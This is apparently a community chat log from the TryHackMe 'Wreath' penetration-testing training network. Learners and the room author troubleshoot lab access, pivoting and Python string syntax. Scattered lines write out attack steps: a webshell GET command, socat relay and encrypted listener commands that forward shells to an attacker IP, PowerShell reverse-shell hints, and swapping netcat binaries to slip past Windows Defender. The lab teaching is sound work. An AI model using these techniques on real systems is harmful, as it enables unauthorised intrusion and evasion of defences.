just gonna check so its there
why did the CLI method break completely feelsbadman
wreath just doesn't want me to finish it lol
Wait.
http://gitserver.thm/exploit.php?a=whoami
Don't send data separately.
It's a GET request this time.
ohhh you're right
The whoami command works
Gonna try the executable again just a simple --help
Good signal. 
No luck
Try fullpath. Also, dir to confirm its there.
Yeah I checked it with dir and it's there, lemme try the full path
still no output
Maybe I could try uploading a static binary of Socat and try getting a reverse shell with Socat?
right now im just going through methods on revshells.com
If your relay is set up properly you can try the direct powershell command too. I had problems with PS so I tried the nc binary. Also, visit this site through the browser so it'll be a bit easier to modify commands.
Which powershell command do you mean? The one in the room? I tried that one first but for some reason it didn't work. Idk though, maybe there's something wrong with the relay. Let me show you the relay syntax
If I understand it right, it's going like "okay, listening for any connections on port 17010, and redirect those to 10.50.91.164 on port 443", right?
also brb 5-10min gotta stretch my legs for a bit lol
Yup.
Thanks @merry robin . Learned so much from this network
Gave +1 Rep to @merry robin
Alright im back
The relay seems to be correct syntax and stuff then
since I'm also using a netcat listener on port 443 of my Kali machine
Try the ps shell one more time with url encoding or C:\Windows\System32\cmd.exe /c c:\windows\temp\nc-USERNAME.exe --help if it works then use prod-serv ip as attacker ip and replace nc path.
sure one sec lol network stopped
I'll give it a last try for the night, otherwise I'll carry on with the Complete Beginner path, thanks so much for helping me man, I really appreciate it
No worries. And try directly on browser this time both with and without encoding.
also i gotta ask are you dark or is this another dark lol its so confusing
Sure! Just waiting for network to be up and running fully again
Nah, I'm not Dark. You can see him on the admin list in the right corner.
yeah that's what tripped me out lol
Should I encode the spaces though?
or fully without encoding?
Try without encoding. If it didn't work then with encoding in the browser.
Nope still no output, oh well I'll give it another try tomorrow
Thanks for the huge effort again!
Can someone help me with the access of the /resources page
is it a bug?
i can't seem to figure it out
nvm i got it
Anyone else having connectivity issues with wreath?
Room died and it's been 12 minutes but I still cannot connect to it
Regenerated my ovpn file and everything
Is there a reset feature to reset the network? (I haven't checked wreath out so I'm not sure) @clear field
i got this error in wreath
I can't comment to the gitstack in task 20 using burpsuite
Can you ssh normally? Looks like a connection problem to me.
anyone done with task 34 double pivoting
Hi, I am stuck on task 6 with the pseudoshell keeping telling me that it "Failed to execute command", whatever type of revshell I try to spawn
And the "shell" command from the exploit end up with a warning for firewall w
Hey guys I am trying to continue my progress through wreath and I can't connect the initial shell on port 10000, when I run the nmap scan it doesn't show up in the scan?
What could I be missing?
Hi all. the id_rsa for task 6 seems to be empty. Doesn't show anything when I cat and just shows an empty file when I nano it as well. I put in a reset vote, but it still needs one more vote...
Hi, is it possible to reset the box without 8 votes? I voted for a reset, because some files were modified and answers weren't right. After the restart apparently the Webmin service is not working correctly. So exploit doesn't work.
I'm hoping for a reset too. Tried for 3 days to get a shell on the git server but it just REFUSES to work for some reason
The port required for the foothold seems to have been patched
Yeah it works now! Great
Fantastic, I'll give it a crack later on cheers for the update!
I just started the wreath room. Can somebody tell me how there are 3 machines and not 2? Is it the cloned machine or something? Sorry if it's a stupid question
Wdym?
There are three machines because it's a network
No but what information in the brief told us that there are 3 machines
The brief tells you that there is a webserver, a backup server, and a PC
Ok thanks I wasn't sure if the backup was counted as a machine
Anyone else facing issue sshing ?
I am doing the bonus question in the socat task. Is anyone able to verify if the command I think it would be, is correct?
Sure
I still can't figure out what to do, I can't ssh to the machine....
It's telling "no routes available" Is there anyone who can help me out with this issue
Should I DM it or post in here?
Sounds like you're missing a VPN there
Just post it here is fine
openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
cat shell.key shell.crt > shell.pem
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -
./socat OPENSSL-LISTEN:VICTIM_B_PORT,cert=shell.pem,verify=0 OPENSSL:LOCAL_IP:LOCAL_PORT,cert=shell.pem,verify=0 &
Nahh... My vpn seems to be fine, I also tried regenerating vpn but it still didn't fix my issue
@scenic temple can you ping the machine?
I tried.... It's telling host unreachable
sounds like VPN then? Ill check to see if I can ping it. 1st machine in Wreath?
This for port forwarding?
Show me what happens when you run ip a?
Yes it is. Not correct?
presume I transferred the openssl cert across to the compromised machine
Seems others have faced the same issue too...
Idk what to do, I'm stuck.
Looks like the machine is up for me
Lemme try again
May sound dumb, but make sure you use 'sudo' for openvpn
Not quite.
You're good with the openssl aspect. The openssl cert only needs to be on the listening side, so you could do something like this:
Attacker:
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0
Compromised Target:
socat TCP-L:<PORT-TO-OPEN>,fork,reuseaddr OPENSSL:<ATTACKER-IP>:<PORT>,verify=0
That should work for a relay, although I'd suggest experimenting with it -- it's late and I don't have notes handy π
Yeaa.. I do use sudo, without sudo we can't connect
Show me ip a
Why wouldn't we want to encrypt it between the compromised machine and target? Wouldn't they be able to see anything sent across that network?
Ideally we would. In practice that would mean we would need to send whatever was coming back to us using socat though (i.e. we would need to send a reverse shell using socat, or some other way of encrypting it in a compatible way). That's not always possible.
Equally, filters are more likely to be at the network egress rather than the machine egress, although both are possible
ok. i think i get ya
If you can send it back encrypted then you would just change the TCP-L for OPENSSL-LISTEN and specify another cert there
so cant share the same cert for both connections?
You could, if you wanted
is it bad practice to? or just something not really discussed as it's so minor?
In general it's a bad idea to transfer things like certs around -- in the same way as it's a bad idea to transfer private SSH keys around. In practice it's unlikely to cause an issue if you're just using a throwaway self-signed cert.
alright cool. thank you for that info Muiri
Np
I am in the pivoting section in the wreath room and after reading it thoroughly I understand it, but it's a bit too much on how to port forward, theory etc., so I wanted to ask: in the upcoming tasks will I practice most of the techniques given and remember them, or should I make detailed notes (which would be quite a lot as there's a lot of stuff in the pivoting section)?
I am currently making notes about what I am doing so I can write a report at the end, but I haven't been writing the theory part. Should I?
The network is a sandbox -- you will be told to pivot, and be expected to use at least one of the techniques taught in the pivoting section. Up to you which one(s) you use @sonic terrace
There's a way that's easier, which is mentioned.
That said, if you're not learning from it then there's no point in doing it. That information is there for a reason. The network is not a challenge, nor should it be -- it's there to provide a practical element to the teaching material.
I need help on Wreath if anyone is available. Specifically, I'm at task 18 and I can't ssh into the original machine with the id_rsa private key file. It keeps saying "invalid format"
Back in task 6, I used the CVE exploit to get the reverse shell. Then as root, I navigated to /root/.ssh/ folder. There I "cat id_rsa" and copied the contents to a blank text file on my attacking machine and named it "id_rsa". - That's what I'm trying to use in task 18: ssh root@10.200.143.200 -i id_rsa ... and it's saying: load key "id_rsa": invalid format
I made sure there aren't any spaces before the "-----BEGIN OPENSSH PRIVATE KEY----- ... or any spaces after the end
... I'm just going to try to do it all over again. Hopefully that will help.
ugh - reset my connection, redid task 6 and it's still giving me the "invalid format" message when I try to ssh using the copied text in the id_rsa file - i don't get it.
are you kidding me? all I needed was a newline at the end of the id_rsa file - wow
Sounds like a valuable lesson learnt there :)
Well done debugging it
root@kali:~# powershell-empire server
[*] Loading default config
[*] Loading stagers from: /usr/share/powershell-empire/empire/server/stagers/
[*] Loading modules from: /usr/share/powershell-empire/empire/server/modules/
[*] Loading listeners from: /usr/share/powershell-empire/empire/server/listeners/
[*] Loading malleable profiles from: /usr/share/powershell-empire/empire/server/data/profiles
[*] Searching for plugins at /usr/share/powershell-empire/empire/server/plugins
[*] Plugin csharpserver found.
[*] Initializing plugin...
[*] Doing custom initialization...
[*] Loading Empire C# server plugin
[*] Registering plugin with menu...
[*] Empire starting up...
[*] Starting Empire RESTful API on 0.0.0.0:1337
[*] Starting Empire SocketIO on 0.0.0.0:5000
[*] Testing APIs
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 169, in _new_conn
    conn = connection.create_connection(
  File "/usr/lib/python3/dist-packages/urllib3/util/connection.py", line 96, in create_connection
    raise err
  File "/usr/lib/python3/dist-packages/urllib3/util/connection.py", line 86, in create_connection
    sock.connect(sa)
ConnectionRefusedError: [Errno 111] Connection refused
During handling of the above exception, another exception occurred:
I am stuck. Not able to launch empire server. Can anyone help? How to get it working?
I think above error has something to do with this.
requests.exceptions.ConnectionError: HTTPSConnectionPool(host='0.0.0.0', port=1337): Max retries exceeded with url: /api/admin/login (Caused by NewConnectionError('<urllib3.connection.HTTPSConnection object at 0x7f2f9c54b0d0>: Failed to establish a new connection: [Errno 111] Connection refused'))
./socat tcp-l:8000 tcp:ATTACKING_IP:443 &
How does this work if we are not specifying the target machine IP?
sorry if I'm missing something obvious
It's a listener
It sits on the target machine and listens for incoming connections, then relays those to the attacker
so if let's say the attacking machine is A and we compromised machine B. We now need access to machine C. How does setting up a listener on A and connecting to it from B give us access to C? Or are we supposed to run the socat program from C?
You're supposed to setup 2 listeners. One on your attacking machine, and one on the already compromised server in this case machine B, with the: ./socat tcp-l:8000 tcp:ATTACKING_IP:443 & From computer C you connect to computer B, which is listening on 8000 and then computer B forwards that connection to yourself on port 443. You do this with powershell script mentioned in a task or get one from the internet.
With the powershell stuff, it didn't work out for me in curl, but worked in burpsuite. Just make sure to url encode it with CTRL^U and make sure it's red.
Hi everyone. Am I the only one who can't access the network?
Even I can't access...
Yeah me too
Was working until now, ffs
I'm really struggling with Task 41. I have followed everything it says and even followed along with @oblique crag's YouTube guide. I can curl in my nc.exe file but when I try to do the powershell.exe it does nothing. I've tried different ports and deleted and redone my git clone but nothing is working. I can still do the wreath=whoami and the wreath=clone... shows a GET request. Does anyone have any suggestions for me?
Hey, I just started on the Wreath network and it seems like someone killed a service I am supposed to exploit. Do I really need to wait for the network to reset? (11/21 votes)
What's the IP for the first box @vestal rose? 21 seems awfully high
It's 10.200.72.200 @merry robin
72 is my dev network. That should have been fixed ages ago.
@limber rover any reason why people are still getting dropped into .72?
Try leaving and rejoining -- it should put you into a different one
That will need Skidy to move you manually then I'm afraid
Alrighty. I guess that means I'll have to do that room after I've been moved then. Pls tag me so I know when to continue, thanks
I did go through this exact same scenario.
What is happening is that the Windows Defender is flagging nc.exe as unsafe and then removes it when you try to run it.
Did you notice the automatic file removal when you run it?
What I did is I used nc64.exe.
Possibly that was not in the AV database and it worked as expected.
Please do let me know if I am wrong somewhere
Also, you can notice the disk space with the dir command. It does not change in accordance with the deletion of nc.exe. So, AV is possibly moving the file away into quarantine.
If I recall, Muiri has already stated that /usr/share/windows-binaries/nc.exe (the one that comes with Kali) may not work, as it is already known to Defender.
@lusty saffron I had tried using that one too but was getting a 404 with the GET request. I ended up closing my terminal tab and opening another and was able to get nc64.exe to successfully load, and after that everything worked well.
Did you find the issue?
Was it some proxy issues with your previous terminal session?
network seems to need some resetting
What happened?
the ssh service on prod-serv is down, i'm unsure how
Muiri may help you
he's asleep
I am just a normal player/member
You can wait till then, or try regenerating your VPN pack.
This is what they tell you, it may possibly help you
lol, waiting till then
guess my studying has to be halted then
it's certainly not the vpn pack though, because i'm not experiencing any connectivity issues from my machine
Well, did you get a reverse shell using Muiri's Webmin exploit script for the Webmin service running on port 10000?
i'm way beyond that phase
If so, then you may at least try to check what's wrong with sshd
So that you can let others and Muiri know beforehand about any possible issue
come on man, i'm telling you the machine is down
well then, till the next reset
Usually means the max number of networks we set has been exceeded - Let me look into it and make the changes to stop this from happening - I'll also increase the network size.
Thank you!
Gave +1 Rep to @limber rover
Hey, my nmap scan did not bring back the desired ports... only 22, 80, 443 and 5355, idk why. I did -oN serviceScan; same result. I did my usual -T4 -A -p- (and -p 1-15000); same result. I did -p 10000, closed (also 9090). I can ping the IP of the network, so I am connected. DNS is also set up, I can access the website. The network is also up, it is in a running state. After reading some writeups I saw that I needed to see at least port 10000 to exploit a service, but it is not open? I guess I am doing something wrong, but after an hour of repeating nmap scans, I cannot find it. Can someone help me?
I guess it is because of .72, isn't it. Damn that sucks. Guess I'll wait
Leave the room, and rejoin.
You should be put into another random network :)
Nope right back into .72
When I leave it says .82, but as soon as I join, it throws me back into 72
this is what I see
probably does not help, but this is all i can give you for now srry
I tried accessing the /home/.ssh folder in the first machine but there is no such folder
is it a different one?
That would be a very unusual place to find a .ssh folder :)
thnx i'll try finding it
it is the user folder, not the home folder i think
found it
Whats your THM username? I'll look into this
Omajan
oooo. there's a room from this room
Guys
Is it just me or does the nmap scan show only 3 ports and an LLMNR filtered port
There isn't any port with a valid CVE
I tried resetting the box but nothing changed
Same happens to me
nmapping of what?
No prob I got it
there is more than one available target, so that's ambiguous
By leaving the room and rejoining the port was up
The port 10000 was closed
But leaving the room fixed it
ok, weird.
that shouldn't have an effect on the network. perhaps restarting ovpn would have fixed it too
Yeah I'm thankful it got fixed anyway
At the beginning I thought resetting the box would fix it, I waited a full day for the reset
wreath sure isn't something you knock out in an afternoon
Gave +1 Rep to @merry robin
@merry robin thanks bro
Gave +1 Rep to @merry robin
I just finished this network and I have to say thanks @merry robin. This has been one of the most enjoyable experiences and has thought me so much about the foundations. I can't wait to continue to expand on this knowledge.
Gave +1 Rep to @merry robin
I am stuck on Task 20. I have used a powershell command I found online that is almost a mirror of Muiri's, and that didn't work. I then decided to use Muiri's and this is the error I get when running the python command:
The mirrored command says it is using non-ASCII characters, so I add in # coding: UTF-8 to the top and it runs, but no shell happens
I then try Muiri and it says syntax error, but I cant see an issue with $stream.Flush
I do have a static copy of ncat on the compromised machine running as well
That will be to do with the quotes in the command @crude imp
Try putting the whole lot in triple quotes
e.g.
command = """POWERSHELL_GOES_HERE"""
Why would that be?
oh. so the initial ' will be cancelled by the immediate next '
Mhm
Why doesn't it cancel each other at the start?
What do you mean?
well it says """ POWERSHELL """ Why don't the first 2 "" make a dead space?
so "(open)"(close)"(open) POWERSHELL "(close)"(open)"(close)
looks like it is counterproductive in my eyes but I have next to no programming understanding
Because """ is a part of the Python syntax in its own right.
It's interpreted as a single entity, rather than as three separate quotation marks
OK. So it is hardcoded into Python that """ is its own syntax?
Specifically it represents a multi-line string, but it's also very useful in situations like this where you would otherwise have to escape stuff
Yes
ok makes sense. Thank you
That seems extra confusing
but if it works....
It's extremely useful
Thank you for your help Muiri
Np
As an example for multiline stuff
That would have been an absolute nightmare if you were trying to do it with line breaks and string formatting
art is set as the variable tho correct?
Yep
It's a variable set with a multi-line string, meaning you don't need to escape line breaks or anything like that
Kinda like a here-doc
looks like a nightmare to make let alone adding in \n
Heh, beyond me definitely. I don't do ascii art
alright so """ can be either a comment or to help close syntax commands with multiple quotation marks OR to also make ASCII art of commands that may need to be run over multiple lines without having to add the necessary newlines and whitespace, etc.
I think i get it lol
Pretty much
It's a multi-line string. That's basically it
thats an easier way to put it
that allows for quotation on a single line?
The "multi-line comment" is literally just a string that hasn't been assigned to a variable
sorry comments
That is how I learnt them in my 3 day crash course of youtube
Yeah, so the string at the top isn't really a comment -- it's just a string that hasn't been assigned to anything
But it functions in the same way
Yes, exactly
well you made that sound a lot easier than I would have guessed lol
That's what happens when I initialise it and print -- exact same string, but now it does something
so you can do both, but it is seen as bad habits to use "" as a comment?
or in practice no one really cares?
I don't think I've ever seen someone use "" as a comment
Everyone uses # for single line comments -- that was just to demonstrate what's happening behind the scenes with multi-line "comments"
i.e. they aren't really comments at all
I am meaning "this is a comment" when I mean ""